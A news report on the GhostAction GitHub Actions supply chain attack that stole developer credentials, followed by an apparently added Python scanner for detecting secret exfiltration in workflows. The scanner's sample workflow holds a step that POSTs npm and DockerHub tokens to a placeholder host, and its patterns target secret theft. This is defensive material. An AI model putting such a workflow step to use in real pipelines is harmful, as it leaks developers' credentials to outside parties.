
GhostAction Attack Exposes 3,325 Developer Secrets in Massive GitHub Supply Chain Breach

GhostAction Campaign

A supply chain attack dubbed "GhostAction" has compromised 327 GitHub users across 817 repositories, successfully exfiltrating 3,325 sensitive credentials, including PyPI, npm, and DockerHub tokens. Security firm GitGuardian discovered the campaign, marking another escalation in the ongoing wave of supply chain attacks targeting the software development ecosystem.

The attack began with the compromise of GitHub user "Grommash9" on September 2, who pushed malicious GitHub Actions workflows disguised as security enhancements. These workflows contained curl commands that sent stolen credentials to an attacker-controlled server at hxxps://bold-dhawan.45-139-104-115.plesk.page via HTTP POST requests.

The attackers systematically enumerated secrets from legitimate workflow files, then hardcoded these secret names into malicious workflows targeting DockerHub credentials, GitHub tokens, and NPM tokens. The malicious workflows bore innocuous titles like "GitHub Actions Security" and were embedded in .github/workflows/github_actions_security.yml files.

GitGuardian's Charles Brossollet noted that "Several companies were found to have their entire SDK portfolio compromised, with malicious workflows affecting their Python, Rust, JavaScript, and Go repositories simultaneously." The attack's scope reveals a highly coordinated effort targeting the modern multi-language development landscape.

This attack comes amid an unprecedented surge in supply chain compromises. Just days earlier, on September 8, 2025, one of the largest npm supply chain incidents in recent history unfolded when popular libraries like debug and chalk, along with 18 other utilities, were hijacked. 

Additionally, the "s1ngularity" attack compromised Nx NPM packages with 24 million monthly downloads using AI-assisted malware to steal developer credentials.

Following disclosure, rapid remediation efforts began immediately. PyPI moved affected projects to read-only status within hours, and GitGuardian successfully created security alerts for 573 of 717 affected projects. 

However, initial discussions with developers confirmed that attackers were actively exploiting stolen AWS access keys and database credentials.

Protecting Against Workflow Attacks

Developers should immediately audit their GitHub Actions workflows for unauthorized changes, rotate any potentially compromised secrets, and implement workflow approval requirements for repository changes. Organizations should also monitor for unexpected workflow executions and restrict workflow permissions to the minimum necessary levels.
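One concrete form the workflow audit above can take, as an added example that is not from the article or from GitGuardian: a dependency-free Python scanner that flags any workflow step which references repository secrets and also invokes curl or wget against a host outside an allowlist, the exfiltration shape the campaign used. The sample workflow and the collector.example.invalid host are constructed placeholders, and the scanner additionally flags the toJSON(secrets) wildcard, which the article does not mention.

```python
"""Flag GitHub Actions steps that reference repository secrets and hand them to
curl/wget bound for a host outside an allowlist (dependency-free, regex based)."""
import re

SECRET_REF = re.compile(r"\$\{\{\s*secrets\.([A-Za-z_][A-Za-z0-9_]*)\s*\}\}")
SECRET_DUMP = re.compile(r"toJSON\(\s*secrets\s*\)")  # dumps every secret at once
URL_HOST = re.compile(r"https?://([A-Za-z0-9.\-]+)", re.IGNORECASE)
NET_TOOL = re.compile(r"\b(?:curl|wget)\b")
# A step begins at a "- " list item whose first key is one of these; rough, but
# adequate for hand-written workflows (matrix entries are not split out).
STEP_START = re.compile(r"^\s*-\s+(?=(?:name|uses|run|id):)", re.MULTILINE)
STEP_NAME = re.compile(r"^\s*name:\s*(.+?)\s*$", re.MULTILINE)

def find_secret_exfil(workflow_text, allowed_hosts):
    """Return one dict per step that references secrets AND calls curl/wget
    against a host outside allowed_hosts; other steps are ignored."""
    findings = []
    for step in STEP_START.split(workflow_text)[1:]:  # chunk 0 is the header
        secrets = sorted(set(SECRET_REF.findall(step)))
        if SECRET_DUMP.search(step):
            secrets.append("*ALL* (toJSON(secrets))")
        if not secrets or not NET_TOOL.search(step):
            continue
        hosts = sorted({h.lower() for h in URL_HOST.findall(step)} - set(allowed_hosts))
        if hosts:
            m = STEP_NAME.search(step)
            name = m.group(1) if m else step.strip().splitlines()[0]
            findings.append({"step": name, "secrets": secrets, "hosts": hosts})
    return findings

# Constructed sample modelled on the pattern the article describes: an innocuously
# named workflow whose step POSTs named secrets to an outside (placeholder) host.
SAMPLE_WORKFLOW = """\
name: GitHub Actions Security
jobs:
  check:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Security check
        run: curl -s -X POST -d "npm=${{ secrets.NPM_TOKEN }}&dh=${{ secrets.DOCKERHUB_TOKEN }}" https://collector.example.invalid/upload
      - name: Query API (benign: secret goes only to an allowlisted host)
        run: curl -H "Authorization: Bearer ${{ secrets.GITHUB_TOKEN }}" https://api.github.com/user
"""
ALLOWED = {"api.github.com", "github.com"}

if __name__ == "__main__":
    for f in find_secret_exfil(SAMPLE_WORKFLOW, ALLOWED):
        print(f"step {f['step']!r}: secrets {f['secrets']} sent to {f['hosts']}")
```

Run it over every file under .github/workflows/ in each repository and treat any finding, together with any recent commit to those files from an unfamiliar account, as grounds to rotate the named secrets.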

The GhostAction campaign underscores the critical vulnerability of CI/CD pipelines in modern software development, where a single compromised workflow can expose an entire organization's development infrastructure.
